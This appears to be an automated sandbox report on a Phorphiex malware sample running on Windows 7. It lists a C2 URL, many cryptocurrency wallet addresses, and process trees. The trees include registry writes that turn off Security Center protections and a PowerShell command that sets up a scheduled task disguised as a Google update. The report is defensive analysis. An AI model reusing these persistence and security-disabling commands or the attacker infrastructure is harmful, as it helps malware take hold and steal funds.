Analysis
-
max time kernel
150s -
max time network
152s -
platform
windows7_x64 -
resource
win7-20220901-en -
resource tags
arch:x64arch:x86image:win7-20220901-enlocale:en-usos:windows7-x64system -
submitted
28-09-2022 09:38
Behavioral task
behavioral1
Sample
tmp.exe
Resource
win7-20220901-en
General
-
Target
tmp.exe
-
Size
75KB
-
MD5
ed2d7b25bb360cccb4f0f6a4f8732d7a
-
SHA1
6ffcc083956c5ac19826bdd87e12f87817ee837c
-
SHA256
22f524abc98f958705febd3761bedc85ec1ae859316a653b67c0c01327533092
-
SHA512
6592ec1a12f9575176474c6192d49f4f4a87998da6692e07e8ba6a93789d6a92e41dbabd3488a27a49ec8c8c414e02751867feb2a0038e4091630ca3e4fb235f
-
SSDEEP
1536:K3Mz8enofIxQrFP+ZrFugrZpVnWw7V15Frrmi:xweZQhGZ5ugDVnj7V15Fr
Malware Config
Extracted
phorphiex
http://185.215.113.66/twizt/
12SJv5p8xUHeiKnXPCDaKCMpqvXj7TABT5BSxGt3csz9Beuc
1A6utf8R2zfLL7X31T5QRHdQyAx16BjdFD
3PFzu8Rw8aDNhDT6d5FMrZ3ckE4dEHzogfg
3BJS4zYwrnfcJMm4xLxRcsa69ght8n6QWz
qpzj59cm0dcyxy9597x927fx0wzu75nns5lsm2452k
XgWbWpuyPGney7hcS9vZ7eNhkj7WcvGcj8
DPcSSyFAYLu4aEB4s1Yotb8ANwtx6bZEQG
0xb899fC445a1b61Cdd62266795193203aa72351fE
LRDpmP5wHZ82LZimzWDLHVqJPDSpkM1gZ7
r1eZ7W1fmUT9tiUZwK6rr3g6RNiE4QpU1
TBdEh7r35ywUD5omutc2kDTX7rXhnFkxy5
t1T7mBRBgTYPEL9RPPBnAVgcftiWUPBFWyy
AGUqhQzF52Qwbvun5wQSrpokPtCC4b9yiX
bitcoincash:qpzj59cm0dcyxy9597x927fx0wzu75nns5lsm2452k
4AtjkCVKbtEC3UEN77SQHuH9i1XkzNiRi5VCbA2XGsJh46nJSXfGQn4GjLuupCqmC57Lo7LvKmFUyRfhtJSvKvuw3h9ReKK
GCVFMTUKNLFBGHE3AHRJH4IJDRZGWOJ6JD2FQTFQAAIQR64ALD7QJHUY
bnb1rcg9mnkzna2tw4u8ughyaj6ja8feyj87hss9ky
bc1qzs2hs5dvyx04h0erq4ea72sctcre2rcwadsq2v
Signatures
-
Processes:
sysrdsvms.exewinrecsv.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\AntiVirusOverride = "1" sysrdsvms.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\UpdatesOverride = "1" sysrdsvms.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\FirewallOverride = "1" winrecsv.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\FirewallDisableNotify = "1" winrecsv.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\FirewallDisableNotify = "1" sysrdsvms.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\UpdatesDisableNotify = "1" winrecsv.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\FirewallOverride = "1" sysrdsvms.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1" sysrdsvms.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\UpdatesDisableNotify = "1" sysrdsvms.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\AntiVirusOverride = "1" winrecsv.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1" winrecsv.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\UpdatesOverride = "1" winrecsv.exe -
Downloads MZ/PE file
-
Executes dropped EXE 10 IoCs
Processes:
winrecsv.exe1546029693.exe267013931.exe2720910907.exesysrdsvms.exe1176812100.exe394619085.exe734023711.exeupdater.exeupdater.exepid process 1220 winrecsv.exe 1344 1546029693.exe 2024 267013931.exe 1228 2720910907.exe 944 sysrdsvms.exe 2032 1176812100.exe 1532 394619085.exe 1940 734023711.exe 1516 updater.exe 2024 updater.exe -
Loads dropped DLL 8 IoCs
Processes:
winrecsv.exe267013931.exesysrdsvms.exetaskeng.exepid process 1220 winrecsv.exe 1220 winrecsv.exe 1220 winrecsv.exe 1220 winrecsv.exe 2024 267013931.exe 944 sysrdsvms.exe 944 sysrdsvms.exe 1672 taskeng.exe -
Processes:
winrecsv.exesysrdsvms.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\AntiVirusOverride = "1" winrecsv.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\AntiSpywareOverride = "1" sysrdsvms.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\UpdatesDisableNotify = "1" sysrdsvms.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\FirewallOverride = "1" sysrdsvms.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\FirewallOverride = "1" winrecsv.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\FirewallDisableNotify = "1" winrecsv.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\UpdatesDisableNotify = "1" winrecsv.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\UpdatesOverride = "1" winrecsv.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\AntiVirusOverride = "1" sysrdsvms.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1" sysrdsvms.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\UpdatesOverride = "1" sysrdsvms.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\AntiSpywareOverride = "1" winrecsv.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1" winrecsv.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\FirewallDisableNotify = "1" sysrdsvms.exe -
Adds Run key to start application 2 TTPs 2 IoCs
Processes:
tmp.exe2720910907.exedescription ioc process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\Windows Settings = "C:\\Windows\\winrecsv.exe" tmp.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\Windows Settings = "C:\\Windows\\sysrdsvms.exe" 2720910907.exe -
Drops file in System32 directory 1 IoCs
Processes:
powershell.exedescription ioc process File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe -
Drops file in Windows directory 4 IoCs
Processes:
tmp.exe2720910907.exedescription ioc process File created C:\Windows\winrecsv.exe tmp.exe File opened for modification C:\Windows\winrecsv.exe tmp.exe File created C:\Windows\sysrdsvms.exe 2720910907.exe File opened for modification C:\Windows\sysrdsvms.exe 2720910907.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Creates scheduled task(s) 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exeschtasks.exepid process 640 schtasks.exe 268 schtasks.exe 1148 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 6 IoCs
Processes:
1546029693.exe394619085.exepowershell.exepowershell.exepowershell.exepowershell.exepid process 1344 1546029693.exe 1532 394619085.exe 1072 powershell.exe 1228 powershell.exe 1472 powershell.exe 1620 powershell.exe -
Suspicious use of AdjustPrivilegeToken 46 IoCs
Processes:
1546029693.exe394619085.exepowershell.exepowershell.exepowershell.exepowershell.exeWMIC.exedescription pid process Token: SeDebugPrivilege 1344 1546029693.exe Token: SeDebugPrivilege 1532 394619085.exe Token: SeDebugPrivilege 1072 powershell.exe Token: SeDebugPrivilege 1228 powershell.exe Token: SeDebugPrivilege 1472 powershell.exe Token: SeDebugPrivilege 1620 powershell.exe Token: SeIncreaseQuotaPrivilege 616 WMIC.exe Token: SeSecurityPrivilege 616 WMIC.exe Token: SeTakeOwnershipPrivilege 616 WMIC.exe Token: SeLoadDriverPrivilege 616 WMIC.exe Token: SeSystemProfilePrivilege 616 WMIC.exe Token: SeSystemtimePrivilege 616 WMIC.exe Token: SeProfSingleProcessPrivilege 616 WMIC.exe Token: SeIncBasePriorityPrivilege 616 WMIC.exe Token: SeCreatePagefilePrivilege 616 WMIC.exe Token: SeBackupPrivilege 616 WMIC.exe Token: SeRestorePrivilege 616 WMIC.exe Token: SeShutdownPrivilege 616 WMIC.exe Token: SeDebugPrivilege 616 WMIC.exe Token: SeSystemEnvironmentPrivilege 616 WMIC.exe Token: SeRemoteShutdownPrivilege 616 WMIC.exe Token: SeUndockPrivilege 616 WMIC.exe Token: SeManageVolumePrivilege 616 WMIC.exe Token: 33 616 WMIC.exe Token: 34 616 WMIC.exe Token: 35 616 WMIC.exe Token: SeIncreaseQuotaPrivilege 616 WMIC.exe Token: SeSecurityPrivilege 616 WMIC.exe Token: SeTakeOwnershipPrivilege 616 WMIC.exe Token: SeLoadDriverPrivilege 616 WMIC.exe Token: SeSystemProfilePrivilege 616 WMIC.exe Token: SeSystemtimePrivilege 616 WMIC.exe Token: SeProfSingleProcessPrivilege 616 WMIC.exe Token: SeIncBasePriorityPrivilege 616 WMIC.exe Token: SeCreatePagefilePrivilege 616 WMIC.exe Token: SeBackupPrivilege 616 WMIC.exe Token: SeRestorePrivilege 616 WMIC.exe Token: SeShutdownPrivilege 616 WMIC.exe Token: SeDebugPrivilege 616 WMIC.exe Token: SeSystemEnvironmentPrivilege 616 WMIC.exe Token: SeRemoteShutdownPrivilege 616 WMIC.exe Token: SeUndockPrivilege 616 WMIC.exe Token: SeManageVolumePrivilege 616 WMIC.exe Token: 33 616 WMIC.exe Token: 34 616 WMIC.exe Token: 35 616 WMIC.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
tmp.exewinrecsv.exe1546029693.execmd.execmd.exe2720910907.exe267013931.exesysrdsvms.exe394619085.execmd.execmd.exe1176812100.exepowershell.exedescription pid process target process PID 1760 wrote to memory of 1220 1760 tmp.exe winrecsv.exe PID 1760 wrote to memory of 1220 1760 tmp.exe winrecsv.exe PID 1760 wrote to memory of 1220 1760 tmp.exe winrecsv.exe PID 1760 wrote to memory of 1220 1760 tmp.exe winrecsv.exe PID 1220 wrote to memory of 1344 1220 winrecsv.exe 1546029693.exe PID 1220 wrote to memory of 1344 1220 winrecsv.exe 1546029693.exe PID 1220 wrote to memory of 1344 1220 winrecsv.exe 1546029693.exe PID 1220 wrote to memory of 1344 1220 winrecsv.exe 1546029693.exe PID 1344 wrote to memory of 1912 1344 1546029693.exe cmd.exe PID 1344 wrote to memory of 1912 1344 1546029693.exe cmd.exe PID 1344 wrote to memory of 1912 1344 1546029693.exe cmd.exe PID 1344 wrote to memory of 1052 1344 1546029693.exe cmd.exe PID 1344 wrote to memory of 1052 1344 1546029693.exe cmd.exe PID 1344 wrote to memory of 1052 1344 1546029693.exe cmd.exe PID 1912 wrote to memory of 1532 1912 cmd.exe reg.exe PID 1912 wrote to memory of 1532 1912 cmd.exe reg.exe PID 1912 wrote to memory of 1532 1912 cmd.exe reg.exe PID 1052 wrote to memory of 968 1052 cmd.exe schtasks.exe PID 1052 wrote to memory of 968 1052 cmd.exe schtasks.exe PID 1052 wrote to memory of 968 1052 cmd.exe schtasks.exe PID 1220 wrote to memory of 2024 1220 winrecsv.exe 267013931.exe PID 1220 wrote to memory of 2024 1220 winrecsv.exe 267013931.exe PID 1220 wrote to memory of 2024 1220 winrecsv.exe 267013931.exe PID 1220 wrote to memory of 2024 1220 winrecsv.exe 267013931.exe PID 1220 wrote to memory of 1228 1220 winrecsv.exe 2720910907.exe PID 1220 wrote to memory of 1228 1220 winrecsv.exe 2720910907.exe PID 1220 wrote to memory of 1228 1220 winrecsv.exe 2720910907.exe PID 1220 wrote to memory of 1228 1220 winrecsv.exe 2720910907.exe PID 1228 wrote to memory of 944 1228 2720910907.exe sysrdsvms.exe PID 1228 wrote to memory of 944 1228 2720910907.exe sysrdsvms.exe PID 1228 wrote to memory of 944 1228 2720910907.exe sysrdsvms.exe PID 1228 wrote to memory of 944 1228 2720910907.exe sysrdsvms.exe PID 2024 wrote to memory of 2032 2024 267013931.exe 1176812100.exe PID 2024 wrote to memory of 2032 2024 267013931.exe 1176812100.exe PID 2024 wrote to memory of 2032 2024 267013931.exe 1176812100.exe PID 2024 wrote to memory of 2032 2024 267013931.exe 1176812100.exe PID 944 wrote to memory of 1532 944 sysrdsvms.exe 394619085.exe PID 944 wrote to memory of 1532 944 sysrdsvms.exe 394619085.exe PID 944 wrote to memory of 1532 944 sysrdsvms.exe 394619085.exe PID 944 wrote to memory of 1532 944 sysrdsvms.exe 394619085.exe PID 1532 wrote to memory of 828 1532 394619085.exe cmd.exe PID 1532 wrote to memory of 828 1532 394619085.exe cmd.exe PID 1532 wrote to memory of 828 1532 394619085.exe cmd.exe PID 1532 wrote to memory of 1360 1532 394619085.exe cmd.exe PID 1532 wrote to memory of 1360 1532 394619085.exe cmd.exe PID 1532 wrote to memory of 1360 1532 394619085.exe cmd.exe PID 828 wrote to memory of 616 828 cmd.exe reg.exe PID 828 wrote to memory of 616 828 cmd.exe reg.exe PID 828 wrote to memory of 616 828 cmd.exe reg.exe PID 1360 wrote to memory of 1108 1360 cmd.exe schtasks.exe PID 1360 wrote to memory of 1108 1360 cmd.exe schtasks.exe PID 1360 wrote to memory of 1108 1360 cmd.exe schtasks.exe PID 2032 wrote to memory of 1072 2032 1176812100.exe powershell.exe PID 2032 wrote to memory of 1072 2032 1176812100.exe powershell.exe PID 2032 wrote to memory of 1072 2032 1176812100.exe powershell.exe PID 1072 wrote to memory of 640 1072 powershell.exe schtasks.exe PID 1072 wrote to memory of 640 1072 powershell.exe schtasks.exe PID 1072 wrote to memory of 640 1072 powershell.exe schtasks.exe PID 2032 wrote to memory of 1228 2032 1176812100.exe powershell.exe PID 2032 wrote to memory of 1228 2032 1176812100.exe powershell.exe PID 2032 wrote to memory of 1228 2032 1176812100.exe powershell.exe PID 944 wrote to memory of 1940 944 sysrdsvms.exe 734023711.exe PID 944 wrote to memory of 1940 944 sysrdsvms.exe 734023711.exe PID 944 wrote to memory of 1940 944 sysrdsvms.exe 734023711.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\tmp.exe"C:\Users\Admin\AppData\Local\Temp\tmp.exe"1⤵
- Adds Run key to start application
- Drops file in Windows directory
- Suspicious use of WriteProcessMemory
PID:1760 -
C:\Windows\winrecsv.exeC:\Windows\winrecsv.exe2⤵
- Windows security bypass
- Executes dropped EXE
- Loads dropped DLL
- Windows security modification
- Suspicious use of WriteProcessMemory
PID:1220 -
C:\Users\Admin\AppData\Local\Temp\1546029693.exeC:\Users\Admin\AppData\Local\Temp\1546029693.exe3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1344 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "User Configuration" /f4⤵
- Suspicious use of WriteProcessMemory
PID:1912 -
C:\Windows\system32\reg.exereg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "User Configuration" /f5⤵PID:1532
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /delete /f /tn "User Configuration"4⤵
- Suspicious use of WriteProcessMemory
PID:1052 -
C:\Windows\system32\schtasks.exeschtasks /delete /f /tn "User Configuration"5⤵PID:968
-
C:\Users\Admin\AppData\Local\Temp\267013931.exeC:\Users\Admin\AppData\Local\Temp\267013931.exe3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2024 -
C:\Users\Admin\AppData\Local\Temp\1176812100.exeC:\Users\Admin\AppData\Local\Temp\1176812100.exe4⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2032 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell <#lipfordu#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { "schtasks /create /f /sc onlogon /rl highest /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe'''" } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe' }5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1072 -
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /tn GoogleUpdateTaskMachineQC /tr 'C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe'6⤵
- Creates scheduled task(s)
PID:640 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell <#oqazi#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "GoogleUpdateTaskMachineQC" } Else { "C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe" }5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1228 -
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /run /tn GoogleUpdateTaskMachineQC6⤵PID:1648
-
C:\Users\Admin\AppData\Local\Temp\2720910907.exeC:\Users\Admin\AppData\Local\Temp\2720910907.exe3⤵
- Executes dropped EXE
- Adds Run key to start application
- Drops file in Windows directory
- Suspicious use of WriteProcessMemory
PID:1228 -
C:\Windows\sysrdsvms.exeC:\Windows\sysrdsvms.exe4⤵
- Windows security bypass
- Executes dropped EXE
- Loads dropped DLL
- Windows security modification
- Suspicious use of WriteProcessMemory
PID:944 -
C:\Users\Admin\AppData\Local\Temp\394619085.exeC:\Users\Admin\AppData\Local\Temp\394619085.exe5⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1532 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "User Configuration" /f6⤵
- Suspicious use of WriteProcessMemory
PID:828 -
C:\Windows\system32\reg.exereg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "User Configuration" /f7⤵PID:616
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /delete /f /tn "User Configuration"6⤵
- Suspicious use of WriteProcessMemory
PID:1360 -
C:\Windows\system32\schtasks.exeschtasks /delete /f /tn "User Configuration"7⤵PID:1108
-
C:\Users\Admin\AppData\Local\Temp\734023711.exeC:\Users\Admin\AppData\Local\Temp\734023711.exe5⤵
- Executes dropped EXE
PID:1940 -
C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exeC:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe6⤵
- Executes dropped EXE
PID:2024 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell <#lipfordu#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { "schtasks /create /f /sc onlogon /rl highest /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe'''" } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe' }7⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1620 -
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /tn GoogleUpdateTaskMachineQC /tr 'C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe'8⤵
- Creates scheduled task(s)
PID:1148 -
C:\Windows\system32\cmd.execmd /c mkdir "C:\Users\Admin\AppData\Roaming\Google\Libs\" & wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Users\Admin\AppData\Roaming\Google\Libs\g.log"7⤵PID:1388
-
C:\Windows\System32\Wbem\WMIC.exewmic PATH Win32_VideoController GET Name, VideoProcessor8⤵
- Suspicious use of AdjustPrivilegeToken
PID:616
-
C:\Windows\system32\taskeng.exetaskeng.exe {4FCE7D72-71EF-4E8D-933B-3745F908F74E} S-1-5-21-4063495947-34355257-727531523-1000:RYNKSFQE\Admin:Interactive:[1]1⤵
- Loads dropped DLL
PID:1672 -
C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exeC:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe2⤵
- Executes dropped EXE
PID:1516 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell <#lipfordu#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { "schtasks /create /f /sc onlogon /rl highest /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe'''" } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe' }3⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1472 -
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /tn GoogleUpdateTaskMachineQC /tr 'C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe'4⤵
- Creates scheduled task(s)
PID:268 -
C:\Windows\system32\cmd.execmd /c mkdir "C:\Users\Admin\AppData\Roaming\Google\Libs\" & wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Users\Admin\AppData\Roaming\Google\Libs\g.log"3⤵PID:1500
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
8KB
MD51f1b20c870a2dc3f79ee75bbedf9d04b
SHA1a1035a7cda7175e3860d68c6419961ac019a1853
SHA2568f7fce104fa87321cd25d98bd3b26579eedd314487369d7e18a9009f5fb7b5a6
SHA51281c74e8a27980b0460bc15f6745d5a4d4ff9c310bfd32c6e59e7acfc098ddbf06a399e3e6eebd77c3f9953fbe7cda92df63668d3e374329c5a5379eeea9fc51e
-
Filesize
6KB
MD565983066e843be01675a7ee2d80e0786
SHA1d87ea8b288d8b065ab9550b93fb4a74fea721dad
SHA25674769851ee802da9f7fce48c4dfadc1fb55fbdf99affa309b76050cb52c3afac
SHA5125d1b1e2d8669f3ed77c458ac82f0ad94197eb4fdb87ee8e62396ef5ed137e25f7484caa3bf694c2c4693b09f7a48c65c4aad15c9be77606c2162c8300c4df511
-
Filesize
2.2MB
MD5f6fd2a4333007f65beef7609077ec14d
SHA13740133e77fae5ee1c0ed1cb0493af5557e3562a
SHA256b2c7dfbe576c1962cd647917207e957d17dbe367c36dde071054f12beac68499
SHA51243c8b557b1bbfb353d4fe37d09c4dd94c7aaab9d9a6fda421144e40e81e2732df7dbd9faa67ca0e1779e787a8771fbcd9496dee2ae03530462910d1393e513d7
-
Filesize
2.2MB
MD5f6fd2a4333007f65beef7609077ec14d
SHA13740133e77fae5ee1c0ed1cb0493af5557e3562a
SHA256b2c7dfbe576c1962cd647917207e957d17dbe367c36dde071054f12beac68499
SHA51243c8b557b1bbfb353d4fe37d09c4dd94c7aaab9d9a6fda421144e40e81e2732df7dbd9faa67ca0e1779e787a8771fbcd9496dee2ae03530462910d1393e513d7
-
Filesize
8KB
MD566bbb99fb92a3688d31a899992f73cdf
SHA1836fad08d9de8ea28c35d1885496af8e1284a6e7
SHA2561d6be0622c56551a30c4bf5560050b226ff0f30dc2c05c5496e389efe51c62b6
SHA5126a710765a53d68f1ab91b460dc16b59e273b1ddab43df01886d5ffd54d35c06f399038a6bb07b63d59933ed3c190d00ba9b59506cd0cd94fbb6ea0949d92ca36
-
Filesize
8KB
MD566bbb99fb92a3688d31a899992f73cdf
SHA1836fad08d9de8ea28c35d1885496af8e1284a6e7
SHA2561d6be0622c56551a30c4bf5560050b226ff0f30dc2c05c5496e389efe51c62b6
SHA5126a710765a53d68f1ab91b460dc16b59e273b1ddab43df01886d5ffd54d35c06f399038a6bb07b63d59933ed3c190d00ba9b59506cd0cd94fbb6ea0949d92ca36
-
Filesize
6KB
MD5f99a026691957a1490c606890021a4db
SHA14eca65b16ce9b8284f3fc54344f8ae15b406b4e1
SHA256db23276681cfb7d843bfc35b96e40dcb77b3bafcb87aa211d3fa6910da6937bd
SHA512e4d9f869e4c12667a91af5792213350b9205a6fd3a2175e3af39571f2066ffa6a4b398a010497f428310b91033b4d5555835ede6669793f5cfd79ae47321421f
-
Filesize
73KB
MD53d1212389bfcdc91be084e6c093a32a1
SHA14f26c5cd52f148af9e40da1daf916e7e86620db9
SHA25693d7749054f314b948a99012fd930ea8a0c4124a72d98746bd21fcd17eb7219c
SHA512b78fa0526f1b5ecf94faf713999e26c7f345bccd85cc1597b7425ceeaf2467c8a4356667d1e6adceb7e7d5aeb90e10df83319fa4e682ee7a5c8471e12e953361
-
Filesize
73KB
MD53d1212389bfcdc91be084e6c093a32a1
SHA14f26c5cd52f148af9e40da1daf916e7e86620db9
SHA25693d7749054f314b948a99012fd930ea8a0c4124a72d98746bd21fcd17eb7219c
SHA512b78fa0526f1b5ecf94faf713999e26c7f345bccd85cc1597b7425ceeaf2467c8a4356667d1e6adceb7e7d5aeb90e10df83319fa4e682ee7a5c8471e12e953361
-
Filesize
8KB
MD566bbb99fb92a3688d31a899992f73cdf
SHA1836fad08d9de8ea28c35d1885496af8e1284a6e7
SHA2561d6be0622c56551a30c4bf5560050b226ff0f30dc2c05c5496e389efe51c62b6
SHA5126a710765a53d68f1ab91b460dc16b59e273b1ddab43df01886d5ffd54d35c06f399038a6bb07b63d59933ed3c190d00ba9b59506cd0cd94fbb6ea0949d92ca36
-
Filesize
8KB
MD566bbb99fb92a3688d31a899992f73cdf
SHA1836fad08d9de8ea28c35d1885496af8e1284a6e7
SHA2561d6be0622c56551a30c4bf5560050b226ff0f30dc2c05c5496e389efe51c62b6
SHA5126a710765a53d68f1ab91b460dc16b59e273b1ddab43df01886d5ffd54d35c06f399038a6bb07b63d59933ed3c190d00ba9b59506cd0cd94fbb6ea0949d92ca36
-
Filesize
6KB
MD5f99a026691957a1490c606890021a4db
SHA14eca65b16ce9b8284f3fc54344f8ae15b406b4e1
